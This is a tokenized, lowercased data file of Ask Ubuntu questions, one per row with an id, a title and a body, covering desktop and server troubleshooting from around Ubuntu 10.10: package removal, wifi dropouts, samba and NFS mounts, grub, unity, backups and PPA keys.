/var/lib/dpkg/info/texlive-pictures-doc.list /var/lib/dpkg/info/texlive-pictures-doc.postrm /var/lib/dpkg/info/texlive-pictures.list /var/lib/dpkg/info/texlive-pictures.postrm /var/lib/dpkg/info/texlive-plain-extra.list /var/lib/dpkg/info/texlive-plain-extra.postrm /var/lib/dpkg/info/texlive-pstricks-doc.list /var/lib/dpkg/info/texlive-pstricks-doc.postrm /var/lib/dpkg/info/texlive-pstricks.list /var/lib/dpkg/info/texlive-pstricks.postrm /var/lib/dpkg/info/texlive-publishers-doc.list /var/lib/dpkg/info/texlive-publishers-doc.postrm /var/lib/dpkg/info/texlive-publishers.list /var/lib/dpkg/info/texlive-publishers.postrm /var/lib/dpkg/info/texlive-science-doc.list /var/lib/dpkg/info/texlive-science-doc.postrm /var/lib/dpkg/info/texlive-science.list /var/lib/dpkg/info/texlive-science.postrm /var/lib/dpkg/info/texlive-xetex.list /var/lib/dpkg/info/texlive-xetex.postrm maria @ marysia-ubuntu : ~ $ i 've used sudo apt-get autoclean without any change . i 've installed deborphan and it showed nothing ( maybe i 've used it in wrong way : just entered command deborphan ) . am i doing something wrong or i was told something which is not true ? i would like to know two things : how to remove packages ( if i 'm doing it in wrong way ) and how to clean hard disc from remains of all packages i 've uninstalled till now ( even if i do n't remember what it was exactly ) . i have ubuntu tweak installed but i do n't know how to use it and i think i prefere terminal commnands . thanks
28262	is there a power-management like opensuse ?	in opensuse there is a applet for choosing different energy-profiles for your notebook . are there any tools/applets that will enable those features for ubuntu ?
28263	gnome panel hides window titlebar	i moved my laptop screen `` below '' external screen ( was using left/right config before ) . there 's a little problem . when my gnome panel is on top of laptop screen , all windows i maximize `` drawn '' under top gnome panel . therefore , i can not see window titlebar . i tried suggested fixes as metacity -- replace and so on , but none worked . when i move my taskbar to bottom it works just fine . any ideas ? thank you .
28268	how to fully delete an application with all settings made ?	i installed awn dock , i tried to change some of the settings and it disappeared . i tried to completely uninstall it using synaptic and reinstall , but when i launch it i ca n't see anything like it kept the error or the setting . it would be helpful to know how to delete the old settings because i also want to install a fresh version of firefox ( brand new ) .
28270	how to tell if your usb ports support usb 3.0 ?	i 'm a ubuntu 10.04 user . what 's the fastest way to tell if the two usb ports on my computer support usb 3.0 ? i 'm not sure if they 're 2.0 or 3.0 , and i need to know . thanks !
28275	is there a way to install the latest version of unity in 10.10 ?	is there a ppa or hack i can use to install the latest version of unity in 10.10 ? i want to use unity as it is in 11.04 , but i do n't want to run alpha versions of everything else .
28281	what events are available for upstart ?	is there a list of available events that can be used for upstart ? for example start on local-filesystems so local-filesystems is an event but when is it triggered and what other events are there ?
28284	pressing backspace does n't open previous page in firefox	in windows when i press the backspace key it goes to the page i surfed before , why does n't it work in ubuntu 10.04 ? how to make it work ?
28290	usb devices ( flash drive , mouse ) not recognised	i am using ubuntu 10.10 . when i mount a usb flash drive or mouse , my laptop does not recognise those devices . can you help me to solve this problem ? thanks
28291	how do i create a file ?	i 'm following instructions about installing and setting tftpd in ubuntu . it asks to create /etc/xinetd.d/tftp and put this entry : service tftp { protocol = udp port = 69 socket_type = dgram wait = yes user = nobody server = /usr/sbin/in.tftpd server_args = /tftpboot disable = no } what does it mean to create ? is there any command i need to type ? and `` put this entry '' - it means to type in one line all the lines above ? i do n't know linux & i need your help please .
28299	dvd with both 32-bit and 64-bit ubuntu	is there any such images in existence that will allow me to install 64-bit ubuntu if supported , or fallback to 32-bit otherwise ? i 'm participating in an installfest by a new and unofficial loco , and such an installer would be quite handy without wasting extra dvds for different architectures .
28302	is there any remote desktop with sound and video capabilities allowing 2 different users work simultaniousely ( a local and a remote one ) ?	i have a very powerful pc with intel processor and a small mac laptop with powerpc processor . both computers are with ubuntu linux . mac laptop can not play flash videos and i can not install any intel-cpu program on it ( like skype ) . so , it means i can install only open source applications on the laptop from ubuntu repositories . i have two different ubuntu system users on pc , say me and she ( and root as well : ) ) . if i work as user me on pc , then user she should also be able to access my pc remotely from her laptop and she should see a desktop of user she , not my desktop . she also must be able watch videos , flash , and listen sounds . is it possible with ubuntu ?
28305	how to create a new file ?	i 've tried gksudo gedit /etc/xinetd.d/tftp ( this is the file i have to create ) i got an error message could n't find the file /etc/xinetd.d/tftp please check that you typed the location correctly and try again what do i need to do ?
28307	sharing samba-folder with root access	i have a staging server in my network running ubuntu server 10.10 , being my main development area . as i need to access the files in the apache root from other computers in the network , i have setup samba with the following settings : [ www ] comment = apache root www path = /var/www writable = yes force user = root force group = root on the host computer , running ubuntu 10.10 desktop , i am trying to mount the drive with a bash file looking like below : # ! /bin/bash sudo mount -t cifs //192.168.1.5/www /media/www/ -o username=myusername , password=mypassword , rw , iocharset=utf8 , file_mode=0777 , dir_mode=0777 what happens is that i get mount error ( 13 ) : permission denied refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) thrown in my face whilst trying to execute the mount . i 've done exactly the same , with exactly the same smb.conf & mount-bash file on another computer in my network , but this just wont work . what am i doing wrong ? i am running out of ideas .
28311	problem with bash script : 'declare : not found '	i had a script which was running fine but when i ran it today , it says declare : not found . i am using bash shell and path at the starting of the script is correct . two flagged lines in my script are as follows : declare -a response response= ( $ result ) it also says ( is unexpected but i guess that is coming up because of the first error . worth mentioning point is when i type in declare directly works fine . declare | grep user shows user=ashfame username=ashfame values= '' $ svn_bash_username '' ; so , whats wrong here ?
28312	simultaneous remote connections	is there any package for ubuntu which allows me to connect to remote computer without disturbing or terminating others who have already connected to that server or who are accessing the computer directly ? . i remember i did this in windows server 2003 installing terminal server when i was doing my course which allowed multiple clients to connect to the server simultaneously with no disturbance to clients and even direct access to server . is there any package like this for ubuntu desktops ?
28316	wifi range issues and intermittent dropouts , thinkpad edge	if i am more than a couple of metres from my access point ( and i 'm seeing this across various aps ) with my newish thinkpad edge 15 , running 10.10 , the wifi performance becomes ... flaky . when this is happening , i see the following in dmesg , although i 'm not sure if it 's related : [ 2497.011099 ] intel ips 0000:00:1f.6 : cpu power or thermal limit exceeded [ 2502.012711 ] intel ips 0000:00:1f.6 : cpu power or thermal limit exceeded [ 2507.009254 ] intel ips 0000:00:1f.6 : cpu power or thermal limit exceeded [ 2512.008367 ] intel ips 0000:00:1f.6 : cpu power or thermal limit exceeded [ 2517.007467 ] intel ips 0000:00:1f.6 : cpu power or thermal limit exceeded [ 2522.006558 ] intel ips 0000:00:1f.6 : cpu power or thermal limit exceeded [ 2527.008157 ] intel ips 0000:00:1f.6 : cpu power or thermal limit exceeded [ 2532.007251 ] intel ips 0000:00:1f.6 : cpu power or thermal limit exceeded [ 2537.003838 ] intel ips 0000:00:1f.6 : cpu power or thermal limit exceeded [ 2542.005427 ] intel ips 0000:00:1f.6 : cpu power or thermal limit exceeded [ 2547.004496 ] intel ips 0000:00:1f.6 : cpu power or thermal limit exceeded [ 2552.003611 ] intel ips 0000:00:1f.6 : cpu power or thermal limit exceeded lspci -vvv has the following to say about my wireless adapter : 03:00.0 network controller : intel corporation centrino wireless-n 1000 subsystem : intel corporation centrino wireless-n 1000 bgn control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 49 region 0 : memory at f0500000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : < access denied > kernel driver in use : iwlagn kernel modules : iwlagn if i get within a couple of metres of the access point , i still see that output in dmesg , but the connection stabilises . my question is threefold : how do i get better wifi range , what can/should i do about those messages in dmesg , and most crucially , are the two related ? as ever let me know if there 's other information that would help ! edit : i am using this machine in exactly the same locations i used my previous thinkpad ( t61 ) running various older versions of ubuntu , so i definitely feel there is something wrong , rather me having unreasonable expectations of range !
28318	macbook pro 2011 compatibility	i 'm planning to a buy a new 13 '' macbook pro , the one that was just released this week with the thunderbolt port . the question is , has anyone given it a shot with ubuntu ( 10.10 or 11.04 alpha ) ? i 'd be especially interested whether temperature sensors/fan control , external displays via the displayport and 3d acceleration ( for compiz or some simple 3d games ) via the integrated hd3000 gpu work without flaws . thanks !
28322	strange sound artifacts when using firefox while music is played	i listen to music using rhythmbox . meanwhile i browse web with firefox . when a page is loading , i switch tabs or i scroll up-down a site ( and sometimes randomly ) , terrible `` cracks '' are audible , and i am extremely irritated by them , as they totally mess up the music . any solutions , or tips how to troubleshoot these sound artifacts ?
28324	is it reasonable to use a gpg certificate for more than one email-account ?	are there any known issues or is this way just a time-saver for lazy people .
28327	why does nautilus have 1735 bugs opened ?	and 459 not replied ... ? https : //bugzilla.gnome.org/browse.cgi ? product=nautilus
28328	how can i disable hibernate completely in kubuntu ?	i have seen the answer on how to disable hibernating ? , but i have no such file . possibly because that suggestion was written for ubuntu , not kubuntu ( kde , not gnome ) . i do not have a swap on my encrypted ssd , my system freezes ( can not even change caps lock ) if i accidentally press the `` hibernate '' button at `` energy management '' . my keyboard has a hibernate button ( fn + f4 ) next to the volume control buttons and every time i press the wrong key , the system will freeze after . so , what is the correct way to disable it ? if there is no solution , a work-around is welcome too .
28333	losing internet connection	i 've recently installed ubuntu 10.04 . after installation i 've updated the system : sudo apt-get update and sudo apt-get upgrade . everything works fine but the internet connection . it 's a wireless connection . sometimes i ca n't open any web page even if the connection applet shows `` connected '' . i have to disconnect and connect once again ; then it works till the next time it breaks . connection is fine , i do n't have any problems with that on the other computer . it 's also possible it 's a hardware problem - the computer is quite old and have n't been used for long time . thanks for any suggestion !
28334	problem when update from 10.04 to 10.10	i select the normal release in update manager and synaptic- > update . after i click the check button , it said that your system is up-to-date , and i can not get the new package of the ubuntu 10.10 . what 's the problem ?
28335	programs do n't start after installing .deb packages	i just installed a fresh copy of ubuntu destop 10.10 on my ( old ) acer laptop . i downloaded synergy and google-earth 's deb file and it opened with the ubuntu software center . now in the applications menu i see a google earth and a synergy option , but they do n't do anything . nothing opens . did i do something wrong ? was there something i needed to do ? thanks
28339	how to get os x style app menu ?	how do i get the app menu to look like osx ? ( not the global menu , the menu items ) i 'm running ubuntu 11.04 with the classic gnome desktop ( not unity ) .
28340	why was tracker desktop search removed ?	i remember a release when tracker was one of the innovations of ubuntu . what happened to it ?
28342	how to maintain document compatibility between libreoffice and other office suites ?	when i save a document in libreoffice and try to open it in office 2007 for example , most or all of the paragraphs moved somehow . for what i found out is that the document has widows and orphans . how do i fix this so the document can be seen 100 % accurate in office 2007 , 2003 , openoffice and libreoffice ? what tips do askubuntu suggest about creating a compatible document between them ( even though you know the non-standard approach of office 2007 in this ) ?
28345	can not boot from ubuntu usb	i create a ubuntu 10.10 bootable usb via the method that is described on the download page of ubuntu . i made that from windows and also from ubuntu 10.04 ( i have dual boot ) . when i boot from the usb made , the menu shows and when i run it , it gives a beep and nothing else . it never boots . usb creation from both methods result the same . i downloaded ubuntu via the torrent provided from ubuntu . any help will be very appreciated . i want to make my usb just like a live cd so that i can run it on some other computers also .
28347	how do i disable desktop icons ?	i do n't like icons on my desktop . on windows i simply click right on the desktop and uncheck `` show desktop icons '' or so . could n't find any similar option in ubuntu 10.10 .
28348	how can i change the icons in pidgin 's irc user list ?	is there any way to change the icons in the user list on irc in pidgin without actually doing it from the source code ? these are what i want to change :
28349	`` bad mirror archive '' : what should i put as the `` mirror of ubuntu archive '' on installation of ubuntu ?	i 'm trying to set up ubuntu from my old macintosh laptop , but when it asks me to put in the `` mirror of ubuntu archive '' i run into problems . for the mirror , i put in mirror.anl.gov for the ubuntu archive mirror directory , i put in pub/ubuntu/ then i leave the http proxy blank and hit `` continue '' it then tries to `` download release files '' , which starts at 0 % , and eventually jumps straight to 100 % and then it presents me with an error of `` bad mirror archive '' . any advice ? i never set up ubuntu before , and i 'm really struggling with this step .
28355	what is the structure of an ubuntu repository ?	how are the files in an ubuntu repository organized ? what are the important files in a repository ? what happens when a repository becomes inconsistent , broken or is being synced ?
28364	binfmt config not persisting after booting	i have the binfmt kernel module set up so i can run .net apps as if they were native binaries . i have the /etc/rc.local file configured identically to this . if i power down my computer or boot into windows , when i come back to ubuntu , i ca n't run .net apps without calling mono . however , if i simply touch /etc/rc.local and restart , the binfmt configuration appears to kick in and i can run my .net exe 's as i expect to . how do i get my configuration to stick ?
28365	how to tweak ubuntu running on an old pc ?	after getting some old , but fancy hardware from my friends , i want to setup a second pc running ubuntu . due to the fact that the hardware is more than five years old , i 'll have to tweak some things to work with acceptable speed . does anyone have some recommendations what do to ? and yes , i need a graphical interface : )
28369	bad archive mirror using pxe boot method	i 'm trying to automatically install ubuntu on a client pc by using the pxe boot method ... .my objectives are below : i am following the steps given in this link installation using pxe boot the server will have a kickstart config file which contains the parameters for the os installation and the files which are required for the os installations . the client will have to detect this configuration along with the setup files and complete the installation without any input from the user . in my server i have installed dhcp3-server , apache2 and tftp to help me with the installation . i have nearly achieved my first objective , i am able to boot my client using the files stored in the server but during the installation stage it is asking me to choose a mirror of ubuntu archive i gave the server 's ip address and the path in the server where the files are located but then its giving me this error bad archive mirror so is it possible that instead of downloading all the files from the internet and storing them on my disk can i use the files which comes with the ubuntu-cd , and how to store these files in what format ( should i zip them ) on the disk ? secondly i am also generating the ks.cfg which i wanted to give to the client for automatic installation of the os . so how should the configuration file be given to the installation process ?
28370	install wireless driver for an hp probook 4525s	i need to install the wifi driver to ubuntu . so i downloaded the driver from hp website but the extension is .rpm , so i need to convert him to .deb so i can install it on ubuntu . the problem is i do n't have internet connection on ubuntu to do this : sudo apt-get install alien how can convert the driver on windows for example , or how can i do download alien and place it under my usb to install it after booting on ubuntu . it 's an hp probook 4525s with this two drivers : pilote lan sans fil ralink pilote lan sans fil broadcom
28372	how do i get the source code of packages installed through apt-get ?	i am assuming that all application installed through apt-get are open source ; but for those that are available in that manner , where can i get the source code for these applications as well as update them ? i have a couple applications i use regularly that are n't being actively developed any longer and i would like to add features . where would i go to get the rights to update these applications ? in this case specifically , i am referring to the hellanzb package
28379	double click on titlebar does n't maximize/restore windows	i used to be able to double click on the titlebar of windows and they would maximize , and return if i double clicked again once maximized . system â preferences âwindows under the titlebar action option is on maximize . but when i double click the windows just scroll up ( shade window ) . how can i change it back ?
28383	how do i use/sync my ubuntu one contacts ?	i have added a lot of contacts through my mobile phone and i have never used ubuntu one before for the desktop . i 've set up all the preferences in ubuntu one but it keeps saying `` syncing '' all the time without any progress . i ca n't see the contacts in evolution , where are the files stored ? please help me .
28384	how to automatically visit a website in the background after ubuntu booted ?	i wanted to know how to automatically visit a website in the background when ubuntu loads . as far as i know w3m is for visiting web site from the console . that is why i am writing following command in the crontab -e. @ reboot w3m http : //example.com/ > test_file the reason for writing content of the web site into a test_file is just to know whether this command has been executed or no . unfortunately it is not executing every time ubuntu loads . but next command which comes after it and looks like this : @ reboot date > > reboot_file is being executed every time . what is wrong with my command ? when i execute it in the console it outputs the content of the example.com into test_file . is there any other options to do that ?
28391	ca n't boot after recent system update	after recent system update ( i think i saw something kernelish but do n't really remember ) my ubuntu becomes unbootable . when i select `` ubuntu '' from the boot menu , i 'm greeted by a grub console and i do n't know what to do ( typing help shows some helpful commands for gods , unfortunately i 'm a mere mortal ) . i 'm doing this on windows xp now . how do i go back to the future ? edit : the ubuntu was installed using wubi
28393	why is this rkhunter script sending empty emails ?	i have started running rkhunter ( a security monitoring tool ) and i have finally managed to clear all of its warnings . now , a cron job runs every day to monitor my machine . rather than send me an email of warnings , it sends me an email with no body - which i do n't really want . looking at the ( unedited , straight out of the box ) /etc/cron.daily/rkhunter script , it contains this snippet of shell code : if [ -s `` $ outfile '' ] ; then ( echo `` subject : [ rkhunter ] $ ( hostname -f ) - daily report '' echo `` to : $ report_email '' echo `` '' cat $ outfile ) | /usr/sbin/sendmail $ report_email fi the -s clause should prevent empty emails from being sent , right ? does anyone have an explanation why this would still send empty emails ?
28394	read error while booting	i am getting the error message read error while booting . after power up , i get a black screen with cursor at top , and after a while around 1:30 min . i get a read error message at the top . i shut down and restarted a couple of times , and it went back to normal . was it a hard-disk error , or was it coming from ubuntu ?
28398	can i install two ubuntu versions on the same machine ?	i have ubuntu 10.10 32 bit already installed on my machine..i am using mongodb and it does not work properly with 32 bit machine . so i want to install 64 bit ubuntu 10.10 on my system on another partition ( so that i can have both 32 bit and 64 bit versions ) . is it okay to install both 32 bit and 64 bit ? i mean will it give any problems ? on which partition should i install the 64 bit version ? my partitions are as follows : filesystem size used avail use % mounted on /dev/sda1 37g 11g 25g 30 % / none 1.4g 260k 1.4g 1 % /dev none 1.4g 776k 1.4g 1 % /dev/shm none 1.4g 244k 1.4g 1 % /var/run none 1.4g 0 1.4g 0 % /var/lock /dev/sda6 129g 73g 50g 60 % /home /dev/sda7 127g 76g 45g 64 % /vol waiting for your replies .
28402	ubuntu one error : invaild signature	i have never connected to ubuntu one , i can log in through http : //one.ubuntu.com and everything on that site works . the client throws this error though ; 2011-02-28 18:05:33,680 - ubuntuone.controlpanel.dbus_service - error - volumesinfoerror : args ( , { 'error_type ' : 'webclienterror ' , 'error_msg ' : u '' ( 400l , 'invalid signature . expected signature base string : get & https % 3a % 2f % 2fone.ubuntu.com % 2fapi % 2faccount % 2f & oauth_consumer_key % 3dtb3ttpd % 26oauth_nonce % 3d01736942 % 26oauth_signature_method % 3dhmac-sha1 % 26oauth_timestamp % 3d1298876730 % 26oauth_token % 3dhkuuguchedzbtcxqdvtqmbnoxontrwsubwxqatykcgamxzecmg % 26oauth_version % 3d1.0 ' ) '' } ) , kwargs { } .
28409	add an ssh option to an sftp url in nautilus	i 'm connecting to a remote server in nautilus using an url of the form sftp : //server.com . however , due to a thing with that server i need to add an option when connecting via ssh , otherwise the login is very , very slow : ssh -o gssapiauthentication=no server.com is there a way to use this option in nautilus with sftp ?
28410	google image search super slow	i 've just started using ubuntu ( 10.10 ) so i have a reasonably fresh install . regardless of if i use the firefox 4 latest beta or 3.6.13 . google image search is dead slow and sometimes intermittently freezes . it 's exceptionally slow compared to the same versions of firefox when i was using windows . as an aside microsoft 's bing does n't freeze .
28412	removed ati proprietary driver , tried to hibernate , destroyed ubuntu installation . help ?	i totally ruined my ubuntu 10.10 desktop x64 installation today . i 've never been able to hibernate or suspend ( not with my laptop , server or htpc ) , not even through this guide . so i read a post here on askubuntu.com that said that the proprietary drivers may be in the way for it to work . therefore i removed my ati-drivers , rebooted , then tried to hibernate the system . i got some error about `` blk_something_something did n't work , resubmitting1 '' . so i turned off the computer and then tried booting up . i see the ubuntu splash but after that i 'm greeted with this screen : the upper dot is the mouse pointer since i can move it with the mouse ( i have ubuntu set to login automatically ) . i do n't know how this happened . what can i do to fix this ? i 'm getting seriously irritated over how buggy ubuntu is , why does n't even suspend/hibernate work ( remember that i have 3 different systems where it fails ) ? so what is the next step ? i want to get into cli mode and reinstall the driver but since i 'm relatively new to ubuntu i do n't know how to get into a terminal without logging in first . and if i press shift during boot i ca n't get into grub either and try something from there . please come with all suggestions you can think of ! thank you very much ! edit : can i use ubuntu on a usb to insert the driver i need - if that is the problem ?
28419	how to most elegantly replace courier new with another font system-wide ?	i am annoyed by courier new on different web sites ( most notably , github ) and would like to replace it with another font ( say , liberation mono ) . i would like the solution to work in all browsers ( so not to be browser specific ) , and i would n't like to uninstall all ms core fonts ( i like the others ) . any ideas ?
28423	use evolution to back up gmail `` sent folder ''	i want to retrieve ( initially via pop ) my gmail account mails , but the idea is just to keep a backup of those mails . but gmail `` sent '' mail is retrieved and put altogether with received mail into my evolution inbox . how can i get mails in my gmail `` sent '' folder from evolution ? ( if i could get my gmail labels , too , that 'll be great , but it 's not a primary goal )
28424	how do you uninstall unity ?	i 've been trying to find out how to uninstall unity for a couple days now and i really wish there was just an uninstall option somewhere ... please help ! ! !
28429	is there a way to launch unity dash outside of unity ?	i 've installed unity 2d , and therefore i 'm able to use the launcher and panel in standard gnome panel desktop . i would like to know whether there is a way to launch the dash only , and if so , if it is possible to assign a shortcut to it . what i 'm thinking of is a wingpanel + slingshot combo on elementary or gnome-shell style 'activities ' button . thanks for your help .
28435	adding a ppa repo and get key signed - no valid openpgp data - proxy issue ?	i want to get a ppa key signed i tried apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys a258828c executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /etc/apt/secring.gpg -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver keyserver.ubuntu.com -- recv-keys a258828c gpg : requesting key a258828c from hkp server keyserver.ubuntu.com gpgkeys : http fetch error 7 : could n't connect to host gpg : no valid openpgp data found . gpg : total number processed : 0 and wget -q http : //ppa.launchpad.net/panda3d/ppa/ubuntu/dists/lucid/release.gpg -o- | apt-key add - gpg : no valid openpgp data found i am behind a proxy , in apt.conf it is configured correctly acquire : :http : :proxy `` http : //proxy.mycompany.de:3128 '' ; i also tried setting proxy export http_proxy= '' proxy.mycompany.de:3128 '' export https_proxy= '' proxy.mycompany.de:3128 ''
28439	recovering package metadata info	from the console , is there a way to recover the architecture of a package when it is not currently installed ? i know the name and version of the package .
28440	what is the best medium for sending feature requests ?	what is the best medium for sending feature requests ? both for ubuntu as a whole and individual ( supported ) apps ?
28443	why dependencies of ubuntu-restricted-extras result non automatic ?	i am trying to write down a small script , whose aim is to print out a list of packages i have installed explicitly . so i take the packages installed after the end of installation , and in the state not automatic , but , between the others , ubuntu-restricted-extras shows this strange , in my opinion , behavior . edit : changed title from `` automatic '' to `` non automatic ''
28444	removing/reducing camera shakyness ?	i strapped a video camera to my motorbike helmet and took this video : http : //www.flickr.com/photos/rorymccann/4787401579/ since it 's strapped to my head and i 'm on a motorcycle on country roads , it bounces up and down a bit . is there any application that will automatically 'remove ' this bouncyness ? i 'm thinking of an application that would offset each frame of the image and add black borders , so that the 'centre ' of the video would be tried to be kept in the centre as much as possible . i know it 's not possible to remove all shakyness , and the video might look odd with all the black borders , but i 'd like to check i 'm not reinventing the wheel before i write this myself . some google searching throws up some applications , are there any for ubuntu linux ?
28451	how to create a shared folder using command line on a server	after following the tutorial here i ran into a problem . here is what i did . on my server i installed nfs-kernel-server and edited the /etc/exports file to include the folder i want to share : /var * ( rw , sync ) on my client machine i edited my fstab file to include share : //128.251.xxx.xxx/var/ ~/uslonsweb003 nfs # username= [ username ] , password= [ password ] , 0 0 entered command : sudo mount -a which gives this error : mount.nfs : remote share not in 'host : dir ' format where did i go wrong with this setup ? also if there is a better way ( using command line ) to setup a folder share on an ubuntu 10.10 server that will be accessed by other linux and windows machines please let me know . update : the mapped drive is now not letting me create , edit , delete files or folders ( readonly access ) my configuration is as follows : client fstab file : 128.251.xxx.xxx : /var /home/coreyf/uslonsweb003 nfs rw , hard , intr , 0 0 server exports file : /var * ( rw , no_root_squash , sync , no_subtree_check ) update 2 : using allans solution my drive mounted correctly however after putting rw , intr as my additional parameters i can not create , edit and delete folders/files .
28452	squeak after lid close	i have a strange problem with ubuntu 10.10 - when i close the laptop lid ( samsung r580 ) it makes a very high squeak . this does n't occur on win7 . i am currently using 2.6.35.27 kernel . if you need some more info to help me with this problem just ask . thanks in advance .
28453	any driver for lexmark z845 ?	is there a driver for lexmark z845 or something compatible with it ?
28458	how to upgrade to a specific version of php ?	i have an ubuntu 10.04 server installation with php 5.3.2 installed , i want to upgrade it to php 5.3.5 . i 'm led to believe that apt-get upgrade will only install security updates , we 're on this lts release and do n't plan on updating our servers until 12.04 , so it 's pretty important for us to be able to update php . any ideas ? many thanks .
28459	how do i simulate a network ?	i want to simulate the following network with 2 laptops connected over internet . how can i do it ? how can i set up the intefaces ? [ i 'm using kvm if it matters ] . any help appreciated .
28464	anything like sisoftware sandra ?	sisoftware sandra is a hardware diagnostic tool for windows : http : //www.sisoftware.net/ the time update my little note book has come , and i encountered the problem of not knowing what is the model of my processor ( the notebook come in two flavours , its asus eee pc 1005ha btw and yes , i did try to google it ) . and its very critical for me since im upgrading the ram . edit : sorry for the misunderstanding , i need to find out my processor model right now but i want to find similar software for future use that is more than just finding what is my processor .
28468	set up grub2 on cloned ubuntu installation	with an ubuntu live disc , i have copied my ubuntu 10.04 installation to a new harddisk ( with the same hardware ) . however , it does n't boot , since i think i still need to set up grub for this new installation . how do i set up grub2 for a copied ubuntu installation ? all the tutorials for grub2 did n't really help me ... running update-grub on the `` original '' ubuntu installation does n't find the copied ubuntu installation .
28470	how do i build unity from source ?	i 'd like to know how i would build unity from source code in the current development release . please cover the following topics : which packages are needed to compile unity ? where would i get the current source code ? what are the steps to actually configure and compile unity ? is it possible to safely run the latest version alongside the version from the repositories ?
28471	can i push data from web to my ubuntu ?	i am trying to do something which involves pushing data to my ubuntu 10.10 desktop from web ( php ) and somehow i can catch that data . just like push emails . thoughts ? ideas ? i know i can setup a cron job to keep checking for events , but is there anything like push which can be done ?
28474	why gnome/ubuntu use samba as default sharing service ?	and not nfs ? click on a folder and select proprieties , tab `` share '' .
28476	how do i zip up a folder but exclude the .git subfolder	i 'm trying to create a zip file from a folder and i 'd like to exclude the .git sub-folder from the resulting zip file . i have gone to the parent folder of the one i want to zip ( called bitvolution ) and i 'm doing : zip -r bitvolution.zip bitvolution -x `` .git '' but it does n't exclude the .git sub-folder . i 've tried various combinations , -x .git* , -x \.git/* , -x .git/\* , -x \.git/\* . i 've also tried using the full path for the exclude argument ... but just did n't get there .
28477	what is safe to exclude for a full system backup ?	i 'm looking for a list which paths/files are safe to exclude for a full system/home backup . considering that i have a list of installed packages . /home/*/.thumbnails /home/*/.cache /home/*/.mozilla/firefox/*.default/cache /home/*/.mozilla/firefox/*.default/offlinecache /home/*/.local/share/trash /home/*/.gvfs/ /tmp/ /var/tmp/ not real folders but can cause severe problems when 'restoring ' /dev /proc /sys what about ... /var/ in general ? /var/backups/ - can get quite large /var/log/ - does not require much space and can help for later comparison /lost+found/
28479	how to make gvfs-smb always use utf8	the problem is that if i make an entry in /etc/fstab to mount a samba share i can give the option iocharset=utf8 and this then mounts the share correctly and in the right encoding with special characters displayed correctly . gnomes automount system for some reason never gets this right and i can find nowhere to change its settings . is there a way to make it always use utf8 by default ? this is with ubuntu 10.10 and the system can display the characters involved .
28491	how to download ubuntu server backups automatically ?	i 'm thinking of an investment in a new root server running ubuntu . due to the fact , that the provider wo n't have extra backup-space , i need an other solution . is it possible to download the server backups automatically when my desktop machine is connected to the internet and in idle state ?
28493	how do i run a script every time a dvd is inserted	i 'd like to run a script every time that a dvd is inserted into the drive . ideally , it would be auto-mounted and then a script would be run . the script would not be on the drive ( not looking for autorun functionality a la windows ) . a command line solution would be optimal !
28495	how do i get my mac to boot from an ubuntu usb key ?	if you select `` usb '' and `` mac '' on this download page , it gives a series of command line instructions to make a usb key which the macbook will boot into ubuntu from . i 've followed them to the letter two or three times on different usb keys , and it does n't work . there 's a very great deal of technical discussion about efi etc . but this set of instructions seems to suggest it should just work , but it does n't . help ? i 'm increasingly unhappy with the more locked-down approach apple is taking , and i 'd quite like to start using linux with a view to transitioning over to using it as my main operating system , but booting from the cd takes forever , runs slowly and i 'm really hoping to get it moving off usb . can anybody help me ?
28496	how do i setup an icecast server for broadcasting audio in my network ?	broadcasting the output of the soundcard as an internet radio stream is a reliable way to stream audio in a network . this can nicely be used to e.g . transmit audio in a wireless lan to another computer or any other device capable of playing internet radio streams . however i did not find an easy step by step guide on how to set this up .
28501	does it makes sense to backup the whole partition as opposed to their files ?	i know that on windows it 's quite futile to try to backup the `` c : '' partition file-wise and that 's why a full partition backup is needed . is it ok to backup a the root linux partition file-wise ? are there any downsides ? clarification here , i do n't care about advantages of partial backups . i 'm going to do additional separate backups of /home , etc . what i 'm interested in here is the comparison of backup of all files from / vs. backup of the whole partition as device what are the advantages of something like dd if=/dev/sda1 ... ?
28504	nx/ssh remote access with remmina	after many days and a lot of frustration , i managed to get freenx to work on my home server . i can connect to it with nomachine 's linux client , but i want to use remmina for this purpose . the problem is that i do n't exactly know how to connect to a nx-server with the program . in the connection dialog , i 've chosen ssh as the protocol , and i 've correctly added the ip and port . under `` ssh authentication '' i 've added my user name on the server , and i choose `` identity file '' and selected the ssh-key i generated ( which works with nxclient ) . ( when am i supposed to provide my password for the user on the server ? ) when i try to connect i get the message : ssh public key authentication failed : public key file does n't exist why do i get this message ? how shall i proceed correctly to get the authentication working ? thank you for your time !
28505	dpkg snippet is n't working for me when fixing / installing dockbar	i 'm trying to use this code from webupd8 to fix the problem i have . it seems it did n't work . sudo dpkg -i -- force-overwrite /var/cache/apt/archives/smplayer_0.6.9+svn3595-1ppa1~maverick1_i386.deb here is the output from my attempt to install dockbar : $ sudo dpkg -i -- force-all var/apt/cache/archives/dockmanager_0.1.0~bzr80-0ubuntu1~10.10~dockers1_i386.deb dpkg : error processing var/apt/cache/archives/dockmanager_0.1.0~bzr80-0ubuntu1~10.10~dockers1_i386.deb ( -- install ) : can not access archive : no such file or directory errors were encountered while processing : var/apt/cache/archives/dockmanager_0.1.0~bzr80-0ubuntu1~10.10~dockers1_i386.deb is there any way around this ?
28511	how can i copy the current path from nautilus ?	in 10.10 , when opening a directory in nautilus , i was wondering how to copy the current path ? my address bar , pictured here , is not copyable :
28514	how are usb ports related to the computer power , and why would they cause my computer to freeze ?	i have an issue with my new toshiba laptop . whenever i plug in an external usb device , if the laptop is not plugged in to the wall , the laptop freezes . however , nothing happens if the laptop is plugged in to the wall . when i say the laptop freezes , i mean it really freezes . the only way to recover is to hard reboot . my question is , what could be causing this ? could it be the extra power drain from the sub devices that causes this ( even the simplest flash drives cause a freeze ) ? please help me out , it 's very annoying . thanks edit doing a google search , i found that there was a bios update that i didnt have . after updating the bios , i no longer have this problem . laptop model : toshiba portege r705-p35 old bios : 1.70 new bios : 1.80 thanks .
